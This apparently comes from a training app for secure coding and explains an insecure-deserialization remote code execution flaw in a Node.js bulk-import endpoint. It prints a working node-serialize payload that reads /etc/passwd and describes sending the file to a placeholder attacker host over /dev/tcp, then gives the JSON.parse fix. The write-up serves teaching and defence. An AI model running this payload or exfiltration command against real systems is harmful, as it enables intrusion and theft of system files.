The Legacy Bulk Import feature at http://127.0.0.1:9090/app/bulkproducts?legacy=true does not securely deserialize the data thus allowing remote code execution.
To execute code we need to provide a serialized object to the server. The object (as shown below) in this case would be a function that uses the child_process library to invoke bash -c -- \"cat /etc/passwd > /dev/tcp/attacker-ip/nc-port\". The function is made into an Immediately Invoked function Expression (IIFE) by adding () to the end of the function
The following input will trigger the vulnerability
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });}()"}
which is the serialized version of
var y = {
rce : function(){
require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });
}(),
}
Vulnerable Code snippet
core/appHandler.js
...
module.exports.bulkProductsLegacy = function (req,res){
// TODO: Deprecate this soon
if(req.files.products){
var products = serialize.unserialize(req.files.products.data.toString('utf8'))
...
Solution
Since the required feature is to essentially parse a JSON, it can be parsed securely using JSON.parse instead.
core/appHandler.js
...
module.exports.bulkProductsLegacy = function (req,res){
// TODO: Deprecate this soon
if(req.files.products){
var products = JSON.parse(req.files.products.data.toString('utf8'))
...
Fixes
Implemented in the following files
- core/appHandler.js
The fix has been implemented in this commit
Recommendation
- Use secure and recommended ways to implement application features
- Ensure that potentially vulnerable legacy features are't accessible
Reference